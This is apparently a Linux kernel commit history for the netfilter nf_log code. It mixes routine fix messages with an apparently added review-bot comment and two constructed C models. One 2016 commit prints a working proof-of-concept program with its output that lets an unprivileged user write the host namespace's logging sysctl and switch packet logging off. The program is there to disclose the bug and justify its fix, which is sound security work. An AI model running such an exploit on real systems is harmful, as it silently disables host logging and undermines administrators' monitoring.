27 Apr, 2020

1 commit

  • Instead of having all the sysctl handlers deal with user pointers, which
    is rather hairy in terms of the BPF interaction, copy the input to and
    from userspace in common code. This also means that the strings are
    always NUL-terminated by the common code, making the API a little bit
    safer.

    As most handlers just pass through the data to one of the common handlers,
    a lot of the changes are mechanical.

    Signed-off-by: Christoph Hellwig
    Acked-by: Andrey Ignatov
    Signed-off-by: Al Viro

    Christoph Hellwig
     

04 Jul, 2019

1 commit


21 May, 2019

1 commit

  • Add SPDX license identifiers to all files which:

    - Have no license information of any form

    - Have EXPORT_.*_SYMBOL_GPL inside which was used in the
    initial scan/conversion to ignore the file

    These files fall under the project license, GPL v2 only. The resulting SPDX
    license identifier is:

    GPL-2.0-only

    Signed-off-by: Thomas Gleixner
    Signed-off-by: Greg Kroah-Hartman

    Thomas Gleixner
     

26 Jun, 2018

2 commits

  • The old code would indefinitely block other users of nf_log_mutex if
    a userspace access in proc_dostring() blocked e.g. due to a userfaultfd
    region. Fix it by moving proc_dostring() out of the locked region.

    This is a followup to commit 266d07cb1c9a ("netfilter: nf_log: fix
    sleeping function called from invalid context"), which changed this code
    from using rcu_read_lock() to taking nf_log_mutex.

    Fixes: 266d07cb1c9a ("netfilter: nf_log: fix sleeping function calle[...]")
    Signed-off-by: Jann Horn
    Signed-off-by: Pablo Neira Ayuso

    Jann Horn
     
  • When proc_dostring() is called with a non-zero offset in strict mode, it
    doesn't just write to the ->data buffer, it also reads. Make sure it
    doesn't read uninitialized data.

    Fixes: c6ac37d8d884 ("netfilter: nf_log: fix error on write NONE to [...]")
    Signed-off-by: Jann Horn
    Signed-off-by: Pablo Neira Ayuso

    Jann Horn
     

16 May, 2018

1 commit

  • Variants of proc_create{,_data} that directly take a struct seq_operations
    and deal with network namespaces in ->open and ->release. All callers of
    proc_create + seq_open_net converted over, and seq_{open,release}_net are
    removed entirely.

    Signed-off-by: Christoph Hellwig

    Christoph Hellwig
     

28 Mar, 2018

1 commit


27 Mar, 2018

1 commit

  • Prefer the direct use of octal for permissions.

    Done with checkpatch -f --types=SYMBOLIC_PERMS --fix-inplace
    and some typing.

    Miscellanea:

    o Whitespace neatening around these conversions.

    Signed-off-by: Joe Perches
    Signed-off-by: David S. Miller

    Joe Perches
     

13 Feb, 2018

1 commit

    The pernet_operations would have had a problem in parallel
    execution with others, if init_net had been able to be released.
    But it's not, and the rest is safe for that.
    There is memory allocation, which nobody else is interested in,
    and sysctl registration. So, we make them async.

    Signed-off-by: Kirill Tkhai
    Acked-by: Andrei Vagin
    Signed-off-by: David S. Miller

    Kirill Tkhai
     

19 Jan, 2018

1 commit

  • /proc has been ignoring struct file_operations::owner field for 10 years.
    Specifically, it started with commit 786d7e1612f0b0adb6046f19b906609e4fe8b1ba
    ("Fix rmmod/read/write races in /proc entries"). Notice the chunk where
    inode->i_fop is initialized with proxy struct file_operations for
    regular files:

    - if (de->proc_fops)
    - inode->i_fop = de->proc_fops;
    + if (de->proc_fops) {
    + if (S_ISREG(inode->i_mode))
    + inode->i_fop = &proc_reg_file_ops;
    + else
    + inode->i_fop = de->proc_fops;
    + }
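    Review bot: with this hunk a regular file's inode->i_fop becomes &proc_reg_file_ops instead of de->proc_fops, so the ->owner the VFS looks at when pinning a module is the proxy's, not the registering module's; that is the concrete mechanism behind the claim above that file_operations::owner has been ignored since this change. A comment on the S_ISREG branch stating that de->proc_fops->owner is no longer consulted would make the intended lifetime rule explicit instead of leaving it to be rediscovered.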

    VFS stopped pinning module at this point.

    # ipvs
    Acked-by: Julian Anastasov
    Signed-off-by: Alexey Dobriyan
    Acked-by: Simon Horman
    Signed-off-by: Pablo Neira Ayuso

    Alexey Dobriyan
     

01 May, 2017

1 commit

  • nf_log_unregister() (which is what gets called in the logger backends
    module exit paths) does a (required, module is removed) synchronize_rcu().

    But nf_log_unset() is only called from pernet exit handlers. It doesn't
    free any memory so there appears to be no need to call synchronize_rcu.

    v2: Liping Zhang points out that nf_log_unregister() needs to be called
    after pernet unregister, else rmmod would become unsafe.

    Signed-off-by: Florian Westphal
    Signed-off-by: Pablo Neira Ayuso

    Florian Westphal
     

07 Apr, 2017

1 commit


04 Feb, 2017

1 commit

  • Pablo Neira Ayuso says:

    ====================
    Netfilter updates for net-next

    The following patchset contains Netfilter updates for your net-next
    tree, they are:

    1) Stash ctinfo 3-bit field into pointer to nf_conntrack object from
    sk_buff so we only access one single cacheline in the conntrack
    hotpath. Patchset from Florian Westphal.

    2) Don't leak pointer to internal structures when exporting x_tables
    ruleset back to userspace, from Willem DeBruijn. This includes new
    helper functions to copy data to userspace such as xt_data_to_user()
    as well as conversions of our ip_tables, ip6_tables and arp_tables
    clients to use it. Not surprisingly, ebtables requires an ad-hoc
    update. There is also a new field in x_tables extensions to indicate
    the amount of bytes that we copy to userspace.

    3) Add nf_log_all_netns sysctl: This new knob allows you to enable
    logging via nf_log infrastructure for all existing netnamespaces.
    Given the effort to provide pernet syslog has been discontinued,
    let's provide a way to restore logging using netfilter kernel logging
    facilities in trusted environments. Patch from Michal Kubecek.

    4) Validate SCTP checksum from conntrack helper, from Davide Caratti.

    5) Merge UDPlite conntrack and NAT helpers into UDP, this was mostly
    a copy&paste from the original helper, from Florian Westphal.

    6) Reset netfilter state when duplicating packets, also from Florian.

    7) Remove unnecessary check for broadcast in IPv6 in pkttype match and
    nft_meta, from Liping Zhang.

    8) Add missing code to deal with loopback packets from nft_meta when
    used by the netdev family, also from Liping.

    9) Several cleanups on nf_tables, one to remove unnecessary check from
    the netlink control plane path to add table, set and stateful objects
    and code consolidation when unregistering chain hooks, from Gao Feng.

    10) Fix harmless reference counter underflow in IPVS that, however,
    results in problems with the introduction of the new refcount_t
    type, from David Windsor.

    11) Enable LIBCRC32C from nf_ct_sctp instead of nf_nat_sctp,
    from Davide Caratti.

    12) Missing documentation on nf_tables uapi header, from Liping Zhang.

    13) Use rb_entry() helper in xt_connlimit, from Geliang Tang.
    ====================

    Signed-off-by: David S. Miller

    David S. Miller
     

02 Feb, 2017

1 commit

  • Commit 69b34fb996b2 ("netfilter: xt_LOG: add net namespace support for
    xt_LOG") disabled logging packets using the LOG target from non-init
    namespaces. The motivation was to prevent containers from flooding
    kernel log of the host. The plan was to keep it that way until syslog
    namespace implementation allows containers to log in a safe way.

    However, the work on syslog namespace seems to have hit a dead end
    somewhere in 2013 and there are users who want to use xt_LOG in all
    network namespaces. This patch allows doing so by setting

    /proc/sys/net/netfilter/nf_log_all_netns

    to a nonzero value. This sysctl is only accessible from init_net so that
    one cannot switch the behaviour from inside a container.

    Signed-off-by: Michal Kubecek
    Signed-off-by: Pablo Neira Ayuso

    Michal Kubeček
     

25 Jan, 2017

1 commit

  • First, log prefix will be truncated to NF_LOG_PREFIXLEN-1, i.e. 127,
    at nf_log_packet(), so the extra part is useless.

    Second, after adding a log rule with a very very long prefix, we will
    fail to dump the nft rules after this _special_ one, but actually,
    they do exist. For example:
    # name_65000=$(printf "%0.sQ" {1..65000})
    # nft add rule filter output log prefix "$name_65000"
    # nft add rule filter output counter
    # nft add rule filter output counter
    # nft list chain filter output
    table ip filter {
        chain output {
            type filter hook output priority 0; policy accept;
        }
    }

    So now, restrict the log prefix length to NF_LOG_PREFIXLEN-1.

    Fixes: 96518518cc41 ("netfilter: add nftables")
    Signed-off-by: Liping Zhang
    Signed-off-by: Pablo Neira Ayuso

    Liping Zhang
     

04 Oct, 2016

1 commit

  • nf_log_proc_dostring() used current's network namespace instead of the one
    corresponding to the sysctl file the write was performed on. Because the
    permission check happens at open time and the nf_log files in namespaces
    are accessible for the namespace owner, this can be abused by an
    unprivileged user to effectively write to the init namespace's nf_log
    sysctls.

    Stash the "struct net *" in extra2 - data and extra1 are already used.

    Repro code:

    #define _GNU_SOURCE
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include

    char child_stack[1000000];

    uid_t outer_uid;
    gid_t outer_gid;
    int stolen_fd = -1;

    void writefile(char *path, char *buf) {
        int fd = open(path, O_WRONLY);
        if (fd == -1)
            err(1, "unable to open thing");
        if (write(fd, buf, strlen(buf)) != strlen(buf))
            err(1, "unable to write thing");
        close(fd);
    }

    int child_fn(void *p_) {
        if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
                  NULL))
            err(1, "mount");

        /* Yes, we need to set the maps for the net sysctls to recognize us
         * as namespace root.
         */
        char buf[1000];
        sprintf(buf, "0 %d 1\n", (int)outer_uid);
        writefile("/proc/1/uid_map", buf);
        writefile("/proc/1/setgroups", "deny");
        sprintf(buf, "0 %d 1\n", (int)outer_gid);
        writefile("/proc/1/gid_map", buf);

        stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
        if (stolen_fd == -1)
            err(1, "open nf_log");
        return 0;
    }

    int main(void) {
        outer_uid = getuid();
        outer_gid = getgid();

        int child = clone(child_fn, child_stack + sizeof(child_stack),
                          CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
                          |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
        if (child == -1)
            err(1, "clone");
        int status;
        if (wait(&status) != child)
            err(1, "wait");
        if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
            errx(1, "child exit status bad");

        char *data = "NONE";
        if (write(stolen_fd, data, strlen(data)) != strlen(data))
            err(1, "write");
        return 0;
    }

    Repro:

    $ gcc -Wall -o attack attack.c -std=gnu99
    $ cat /proc/sys/net/netfilter/nf_log/2
    nf_log_ipv4
    $ ./attack
    $ cat /proc/sys/net/netfilter/nf_log/2
    NONE

    Because this looks like an issue with very low severity, I'm sending it to
    the public list directly.

    Signed-off-by: Jann Horn
    Signed-off-by: Pablo Neira Ayuso

    Jann Horn
     

30 Aug, 2016

1 commit


05 Jul, 2016

1 commit

  • It is hard to unbind nf-logger:

    echo NONE > /proc/sys/net/netfilter/nf_log/0
    bash: echo: write error: No such file or directory

    sysctl -w net.netfilter.nf_log.0=NONE
    sysctl: setting key "net.netfilter.nf_log.0": No such file or directory
    net.netfilter.nf_log.0 = NONE

    You need to explicitly send '\0', for instance like:

    echo -e "NONE\0" > /proc/sys/net/netfilter/nf_log/0

    That seems strange, so fix it using proc_dostring.

    Now it works fine:
    modprobe nfnetlink_log
    echo nfnetlink_log > /proc/sys/net/netfilter/nf_log/0
    cat /proc/sys/net/netfilter/nf_log/0
    nfnetlink_log
    echo NONE > /proc/sys/net/netfilter/nf_log/0
    cat /proc/sys/net/netfilter/nf_log/0
    NONE

    v2: add missed error check for proc_dostring

    Signed-off-by: Pavel Tikhomirov
    Signed-off-by: Pablo Neira Ayuso

    Pavel Tikhomirov
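    To make the difference concrete, here is an added C model written for this page (not the kernel's nf_log.c) of the write path before and after this change; it also shows the point of the Apr 2020 commit at the top of this history, that the common code always hands the handler a NUL-terminated string. The logger table, NFLOGGER_NAME_LEN and the helper names are constructed; the behaviour being modelled (echo NONE fails with ENOENT before, binds after) is the one the commit message reports.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

/* Constructed model for this page, not the kernel's code: the nf_log sysctl
 * write path before and after the switch to proc_dostring.  The logger table,
 * NFLOGGER_NAME_LEN and the helper names are invented; the behaviour modelled
 * (a bare "NONE" from echo failing with ENOENT before and binding after) is
 * the one the commit message reports. */
#define NFLOGGER_NAME_LEN 32

static const char *const known_loggers[] = {
    "NONE", "nf_log_ipv4", "nf_log_ipv6", "nf_log_arp", "nfnetlink_log",
};

/* Shared tail: resolve the parsed name and store it.  -ENOENT for an unknown
 * name is what the shell showed as "No such file or directory". */
static int nf_log_bind(const char *name, char *out)
{
    for (size_t i = 0; i < sizeof known_loggers / sizeof *known_loggers; i++) {
        if (strcmp(name, known_loggers[i]) == 0) {
            snprintf(out, NFLOGGER_NAME_LEN, "%s", name);
            return 0;
        }
    }
    return -ENOENT;
}

/* Old shape: the user buffer is copied by length and compared as is.  "NONE\n"
 * from echo is not a logger name; only a buffer that carries its own
 * terminator ("NONE\0") compares equal, hence the echo -e "NONE\0" workaround. */
static int old_nf_log_write(const char *buf, size_t len, char *out)
{
    char tmp[NFLOGGER_NAME_LEN];

    if (len >= sizeof tmp)
        return -EINVAL;
    memcpy(tmp, buf, len);
    tmp[len] = '\0';
    return nf_log_bind(tmp, out);
}

/* Model of proc_dostring on a write: copy at most maxlen-1 bytes, stop at the
 * first newline or NUL, always NUL-terminate.  Returns the bytes kept. */
static size_t proc_dostring_write(const char *buf, size_t len, char *dst, size_t maxlen)
{
    size_t n = 0;

    while (n < len && n + 1 < maxlen && buf[n] != '\n' && buf[n] != '\0') {
        dst[n] = buf[n];
        n++;
    }
    dst[n] = '\0';
    return n;
}

/* New shape: the handler only ever sees a clean, terminated string, so echo,
 * sysctl -w and the explicit-NUL form all behave the same, and an overlong
 * write is truncated rather than rejected or allowed to overrun the buffer. */
static int new_nf_log_write(const char *buf, size_t len, char *out)
{
    char tmp[NFLOGGER_NAME_LEN];

    proc_dostring_write(buf, len, tmp, sizeof tmp);
    return nf_log_bind(tmp, out);
}

/* 1 if the write binds a logger under the given handler, 0 if it is refused. */
static int write_binds(int (*fn)(const char *, size_t, char *), const char *buf, size_t len)
{
    char out[NFLOGGER_NAME_LEN] = "nfnetlink_log";
    return fn(buf, len, out) == 0;
}

/* Constructed inputs: an overlong name and a scratch buffer for callers. */
static const char overlong[] = "QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ";
static char scratch[NFLOGGER_NAME_LEN];

int main(void)
{
    printf("old: echo NONE       -> binds=%d\n", write_binds(old_nf_log_write, "NONE\n", 5));
    printf("old: echo -e NONE\\0  -> binds=%d\n", write_binds(old_nf_log_write, "NONE\0\n", 6));
    printf("new: echo NONE       -> binds=%d\n", write_binds(new_nf_log_write, "NONE\n", 5));
    printf("new: kept %zu of %zu bytes of an overlong write\n",
           proc_dostring_write(overlong, sizeof overlong - 1, scratch, sizeof scratch),
           sizeof overlong - 1);
    return 0;
}
```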
     

23 Jun, 2016

2 commits


17 Sep, 2015

1 commit


14 Sep, 2015

1 commit

  • like nf_log_unset, nf_log_unregister must not reset the list of loggers.
    Otherwise, a call to nf_log_unregister() will render loggers of other nf
    protocols unusable:

    iptables -A INPUT -j LOG
    modprobe nf_log_arp ; rmmod nf_log_arp
    iptables -A INPUT -j LOG
    iptables: No chain/target/match by that name

    Fixes: 30e0c6a6be ("netfilter: nf_log: prepare net namespace support for loggers")
    Signed-off-by: Florian Westphal
    Signed-off-by: Pablo Neira Ayuso

    Florian Westphal
     

19 Mar, 2015

1 commit

  • Since fab4085 ("netfilter: log: nf_log_packet() as real unified
    interface"), the loginfo structure that is passed to nf_log_packet() is
    used to explicitly indicate the logger type you want to use.

    This is a problem for people tracing rules through nfnetlink_log since
    packets are always routed to the NF_LOG_TYPE logger after the
    aforementioned patch.

    We can fix this by removing the trace loginfo structures, but that still
    changes the log level from 4 to 5 for tracing messages and there may be
    someone relying on this out there. So let's just introduce a new
    nf_log_trace() function that restores the former behaviour.

    Reported-by: Markus Kötter
    Signed-off-by: Pablo Neira Ayuso

    Pablo Neira Ayuso
     

23 Dec, 2014

1 commit


12 Dec, 2014

1 commit

  • Pull networking updates from David Miller:

    1) New offloading infrastructure and example 'rocker' driver for
    offloading of switching and routing to hardware.

    This work was done by a large group of dedicated individuals, not
    limited to: Scott Feldman, Jiri Pirko, Thomas Graf, John Fastabend,
    Jamal Hadi Salim, Andy Gospodarek, Florian Fainelli, Roopa Prabhu

    2) Start making the networking operate on IOV iterators instead of
    modifying iov objects in-situ during transfers. Thanks to Al Viro
    and Herbert Xu.

    3) A set of new netlink interfaces for the TIPC stack, from Richard
    Alpe.

    4) Remove unnecessary looping during ipv6 routing lookups, from Martin
    KaFai Lau.

    5) Add PAUSE frame generation support to gianfar driver, from Matei
    Pavaluca.

    6) Allow for larger reordering levels in TCP, which are easily
    achievable in the real world right now, from Eric Dumazet.

    7) Add a variable of napi_schedule that doesn't need to disable cpu
    interrupts, from Eric Dumazet.

    8) Use a doubly linked list to optimize neigh_parms_release(), from
    Nicolas Dichtel.

    9) Various enhancements to the kernel BPF verifier, and allow eBPF
    programs to actually be attached to sockets. From Alexei
    Starovoitov.

    10) Support TSO/LSO in sunvnet driver, from David L Stevens.

    11) Allow controlling ECN usage via routing metrics, from Florian
    Westphal.

    12) Remote checksum offload, from Tom Herbert.

    13) Add split-header receive, BQL, and xmit_more support to amd-xgbe
    driver, from Thomas Lendacky.

    14) Add MPLS support to openvswitch, from Simon Horman.

    15) Support wildcard tunnel endpoints in ipv6 tunnels, from Steffen
    Klassert.

    16) Do gro flushes on a per-device basis using a timer, from Eric
    Dumazet. This tries to resolve the conflicting goals between the
    desired handling of bulk vs. RPC-like traffic.

    17) Allow userspace to ask for the CPU upon what a packet was
    received/steered, via SO_INCOMING_CPU. From Eric Dumazet.

    18) Limit GSO packets to half the current congestion window, from Eric
    Dumazet.

    19) Add a generic helper so that all drivers set their RSS keys in a
    consistent way, from Eric Dumazet.

    20) Add xmit_more support to enic driver, from Govindarajulu
    Varadarajan.

    21) Add VLAN packet scheduler action, from Jiri Pirko.

    22) Support configurable RSS hash functions via ethtool, from Eyal
    Perry.

    * git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next: (1820 commits)
    Fix race condition between vxlan_sock_add and vxlan_sock_release
    net/macb: fix compilation warning for print_hex_dump() called with skb->mac_header
    net/mlx4: Add support for A0 steering
    net/mlx4: Refactor QUERY_PORT
    net/mlx4_core: Add explicit error message when rule doesn't meet configuration
    net/mlx4: Add A0 hybrid steering
    net/mlx4: Add mlx4_bitmap zone allocator
    net/mlx4: Add a check if there are too many reserved QPs
    net/mlx4: Change QP allocation scheme
    net/mlx4_core: Use tasklet for user-space CQ completion events
    net/mlx4_core: Mask out host side virtualization features for guests
    net/mlx4_en: Set csum level for encapsulated packets
    be2net: Export tunnel offloads only when a VxLAN tunnel is created
    gianfar: Fix dma check map error when DMA_API_DEBUG is enabled
    cxgb4/csiostor: Don't use MASTER_MUST for fw_hello call
    net: fec: only enable mdio interrupt before phy device link up
    net: fec: clear all interrupt events to support i.MX6SX
    net: fec: reset fep link status in suspend function
    net: sock: fix access via invalid file descriptor
    net: introduce helper macro for_each_cmsghdr
    ...

    Linus Torvalds
     

06 Nov, 2014

1 commit

  • The return value of seq_printf() is soon to be removed. Remove the
    checks from seq_printf() in favor of seq_has_overflowed().

    Link: http://lkml.kernel.org/r/20141104142236.GA10239@salvia
    Acked-by: Pablo Neira Ayuso
    Cc: Patrick McHardy
    Cc: Jozsef Kadlecsik
    Cc: netfilter-devel@vger.kernel.org
    Cc: coreteam@netfilter.org
    Signed-off-by: Steven Rostedt

    Steven Rostedt (Red Hat)
     

05 Nov, 2014

1 commit


30 Oct, 2014

2 commits


14 Oct, 2014

1 commit

  • The kernel used to contain two functions for length-delimited,
    case-insensitive string comparison, strnicmp with correct semantics and
    a slightly buggy strncasecmp. The latter is the POSIX name, so strnicmp
    was renamed to strncasecmp, and strnicmp made into a wrapper for the new
    strncasecmp to avoid breaking existing users.

    To allow the compat wrapper strnicmp to be removed at some point in the
    future, and to avoid the extra indirection cost, do
    s/strnicmp/strncasecmp/g.

    Signed-off-by: Rasmus Villemoes
    Cc: "David S. Miller"
    Signed-off-by: Andrew Morton
    Signed-off-by: Linus Torvalds

    Rasmus Villemoes
     

27 Jun, 2014

2 commits

  • This adds the generic plain text packet logger for bridged packets.
    It routes the logging message to the real protocol packet logger.
    I decided not to refactor the ebt_log code for two reasons:

    1) The ebt_log output is not consistent with the IPv4 and IPv6
    Netfilter packet loggers. The output is different for no good
    reason and it adds redundant code to handle packet logging.

    2) To avoid breaking backward compatibility for applications
    out there that are parsing the specific ebt_log output, the ebt_log
    output has been left as is. So only nftables will use the new
    consistent logging format for logged bridged packets.

    More decisions coming in this patch:

    1) This also removes ebt_log as default logger for bridged packets.
    Thus, nf_log_packet() routes packet to this new packet logger
    instead. This doesn't break backward compatibility since
    nf_log_packet() is not used to log packets in plain text format
    from anywhere in the ebtables/netfilter bridge code.

    2) The new bridge packet logger also performs a lazy request to
    register the real IPv4, ARP and IPv6 netfilter packet loggers.
    If the real protocol logger is not available (not compiled in or the
    module is not available in the system), no packet logging happens.

    Signed-off-by: Pablo Neira Ayuso

    Pablo Neira Ayuso
     
  • Before this patch, the nf_loginfo parameter specified the logging
    configuration in case the specified default logger was loaded. This
    patch updates the semantics of the nf_loginfo parameter in
    nf_log_packet() which now indicates the logger that you explicitly
    want to use.

    Thus, nf_log_packet() is exposed as a unified interface which
    internally routes the log message to the corresponding logger type
    by family.

    The module dependencies are expressed by the new nf_logger_find_get()
    and nf_logger_put() functions which bump the logger module refcount.
    Thus, you can not remove logger modules that are used by rules anymore.

    Another important effect of this change is that the family specific
    module is only loaded when required. Therefore, xt_LOG and nft_log
    will just trigger the autoload of the nf_log_{ip,ip6} modules
    according to the family.

    Signed-off-by: Pablo Neira Ayuso

    Pablo Neira Ayuso
     

26 Jun, 2014

2 commits

  • This patch moves Eric Dumazet's log buffer implementation from the
    xt_log.h header file to the core net/netfilter/nf_log.c. This also
    includes the renaming of the structure and functions to avoid possible
    undesired namespace clashes.

    This change allows us to use it from the arp and bridge packet logging
    implementation in follow up patches.

    Pablo Neira Ayuso
     
  • Now that legacy ulog targets are not available anymore in the tree, we
    can have up to two possible loggers:

    1) The plain text logging via kernel logging ring.
    2) The nfnetlink_log infrastructure which delivers log messages
    to userspace.

    This patch replaces the list of loggers by an array of two pointers
    per family for each possible logger and it also introduces a new field
    to the nf_logger structure which indicates the position in the logger
    array (based on the logger type).

    This prepares a follow up patch that consolidates the nf_log_packet()
    interface by allowing the logger to be specified as a parameter.

    Signed-off-by: Pablo Neira Ayuso

    Pablo Neira Ayuso
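    The registry shape this commit introduces, and the Sep 2015 fix further up this page that stops nf_log_unregister() from zapping other families' loggers, can both be shown with one added C model. This is illustrative code written for this page, not the kernel's nf_log.c: the NFPROTO_* and NF_LOG_TYPE_* values follow the kernel's names, while the struct layout, the absence of RCU and the mutex, and the helper names are constructed assumptions.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

/* Constructed model for this page of the registry shape the Jun 2014 commit
 * describes (an array of NF_LOG_TYPE_MAX logger pointers per family) together
 * with the Sep 2015 fix to nf_log_unregister.  NFPROTO_* and NF_LOG_TYPE_*
 * follow the kernel's names; everything else (struct layout, helper names,
 * no RCU, no locking) is illustrative. */
enum { NFPROTO_UNSPEC = 0, NFPROTO_IPV4 = 2, NFPROTO_ARP = 3,
       NFPROTO_BRIDGE = 7, NFPROTO_IPV6 = 10, NFPROTO_NUMPROTO = 13 };
enum { NF_LOG_TYPE_LOG = 0, NF_LOG_TYPE_ULOG = 1, NF_LOG_TYPE_MAX };

struct nf_logger {
    const char *name;
    int type;   /* the new field: position in the per-family array */
};

static const struct nf_logger *loggers[NFPROTO_NUMPROTO][NF_LOG_TYPE_MAX];

/* Register for one family, or for every family when pf is NFPROTO_UNSPEC.
 * A slot already held by a different logger of the same type is refused. */
static int nf_log_register(int pf, const struct nf_logger *logger)
{
    int first = pf, last = pf + 1;

    if (pf < 0 || pf >= NFPROTO_NUMPROTO ||
        logger->type < 0 || logger->type >= NF_LOG_TYPE_MAX)
        return -EINVAL;
    if (pf == NFPROTO_UNSPEC) {
        first = 0;
        last = NFPROTO_NUMPROTO;
    }
    for (int i = first; i < last; i++)
        if (loggers[i][logger->type] && loggers[i][logger->type] != logger)
            return -EEXIST;
    for (int i = first; i < last; i++)
        loggers[i][logger->type] = logger;
    return 0;
}

/* Correct unregister: clear only the slots this logger occupies.
 * Returns the number of slots cleared. */
static int nf_log_unregister(const struct nf_logger *logger)
{
    int cleared = 0;

    for (int i = 0; i < NFPROTO_NUMPROTO; i++)
        for (int j = 0; j < NF_LOG_TYPE_MAX; j++)
            if (loggers[i][j] == logger) {
                loggers[i][j] = NULL;
                cleared++;
            }
    return cleared;
}

/* The pre-fix behaviour the Sep 2015 commit describes, kept for contrast:
 * unregistering one logger resets the whole table. */
static int nf_log_unregister_zap_all(const struct nf_logger *logger)
{
    (void)logger;
    memset(loggers, 0, sizeof loggers);
    return NFPROTO_NUMPROTO * NF_LOG_TYPE_MAX;
}

/* What a rule such as "-j LOG" asks for at checkentry time. */
static const struct nf_logger *nf_logger_find(int pf, int type)
{
    if (pf < 0 || pf >= NFPROTO_NUMPROTO || type < 0 || type >= NF_LOG_TYPE_MAX)
        return NULL;
    return loggers[pf][type];
}

static const struct nf_logger nf_ipv4_logger = { "nf_log_ipv4", NF_LOG_TYPE_LOG };
static const struct nf_logger nf_arp_logger  = { "nf_log_arp",  NF_LOG_TYPE_LOG };

/* Replay the shell session from the Sep 2015 commit.  Returns 1 if the second
 * "iptables -A INPUT -j LOG" still finds the IPv4 plain-text logger after
 * nf_log_arp has been loaded and removed, 0 if it would fail. */
static int replay(int (*unregister)(const struct nf_logger *))
{
    memset(loggers, 0, sizeof loggers);
    nf_log_register(NFPROTO_IPV4, &nf_ipv4_logger);
    if (nf_logger_find(NFPROTO_IPV4, NF_LOG_TYPE_LOG) != &nf_ipv4_logger)  /* iptables -A INPUT -j LOG */
        return 0;
    nf_log_register(NFPROTO_ARP, &nf_arp_logger);    /* modprobe nf_log_arp */
    unregister(&nf_arp_logger);                      /* rmmod nf_log_arp */
    return nf_logger_find(NFPROTO_IPV4, NF_LOG_TYPE_LOG) == &nf_ipv4_logger;  /* -j LOG again */
}

int main(void)
{
    printf("fixed unregister:   ipv4 LOG still usable=%d\n", replay(nf_log_unregister));
    printf("zap-all unregister: ipv4 LOG still usable=%d\n", replay(nf_log_unregister_zap_all));
    return 0;
}
```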
     

13 Jun, 2013

1 commit

  • Reduce the uses of this unnecessary typedef.

    Done via perl script:

    $ git grep --name-only -w ctl_table net | \
    xargs perl -p -i -e '\
    sub trim { my ($local) = @_; $local =~ s/(^\s+|\s+$)//g; return $local; } \
    s/\b(?<!struct\s)ctl_table\b(\s*\*\s*|\s+\w+)/"struct ctl_table " . trim($1)/ge'

    Reflow the modified lines that now exceed 80 columns.

    Signed-off-by: Joe Perches
    Signed-off-by: David S. Miller

    Joe Perches
     

06 Jun, 2013

1 commit

  • Conflicts:
    net/netfilter/nf_log.c

    The conflict in nf_log.c is that in 'net' we added CONFIG_PROC_FS
    protection around foo_proc_entry() calls to fix a build failure,
    whereas in Pablo's tree a guard if() test around a call to
    remove_proc_entry() was removed. Trivially resolved.

    Pablo Neira Ayuso says:

    ====================
    The following patchset contains the first batch of
    Netfilter/IPVS updates for your net-next tree, they are:

    * Three patches with improvements and code refactorization
    for nfnetlink_queue, from Florian Westphal.

    * FTP helper now parses replies without brackets, as RFC1123
    recommends, from Jeff Mahoney.

    * Raise a warning to tell everyone about ULOG deprecation,
    NFLOG has been already in the kernel tree for long time
    and supersedes the old logging over netlink stub, from
    myself.

    * Don't panic if we fail to load netfilter core framework,
    just bail out instead, from myself.

    * Add cond_resched_rcu, used by IPVS to allow rescheduling
    while walking over big hashtables, from Simon Horman.

    * Change type of IPVS sysctl_sync_qlen_max sysctl to avoid
    possible overflow, from Zhang Yanfei.

    * Use strlcpy instead of strncpy to skip zeroing of already
    initialized area to write the extension names in ebtables,
    from Chen Gang.

    * Use already existing per-cpu notrack object from xt_CT,
    from Eric Dumazet.

    * Save explicit socket lookup in xt_socket now that we have
    early demux, also from Eric Dumazet.
    ====================

    Signed-off-by: David S. Miller

    David S. Miller
     

23 May, 2013

1 commit


15 May, 2013

1 commit

  • Since (69b34fb netfilter: xt_LOG: add net namespace support
    for xt_LOG), we hit this:

    [ 4224.708977] BUG: unable to handle kernel NULL pointer dereference at 0000000000000388
    [ 4224.709074] IP: [] ipt_log_packet+0x29/0x270

    when calling log functions from conntrack both in and out
    are NULL i.e. the net pointer is invalid.

    Adding struct net *net in call to nf_logfn() will secure that
    there always is a valid net ptr.

    Reported as netfilter's bugzilla bug 818:
    https://bugzilla.netfilter.org/show_bug.cgi?id=818

    Reported-by: Ronald
    Signed-off-by: Hans Schillstrom
    Signed-off-by: Pablo Neira Ayuso

    Hans Schillstrom
     

06 May, 2013

1 commit

  • This patch fixes the following compilation error:

    net/netfilter/nf_log.c:373:38: error: 'struct netns_nf' has no member named 'proc_netfilter'

    if procfs is not set.

    The netns support for nf_log, nfnetlink_log and nfnetlink_queue_core
    requires CONFIG_PROC_FS in the removal path of their respective
    /proc interface since net->nf.proc_netfilter is undefined in that
    case.

    Reported-by: Fengguang Wu
    Signed-off-by: Pablo Neira Ayuso
    Acked-by: Gao feng

    Pablo Neira Ayuso
     

06 Apr, 2013

1 commit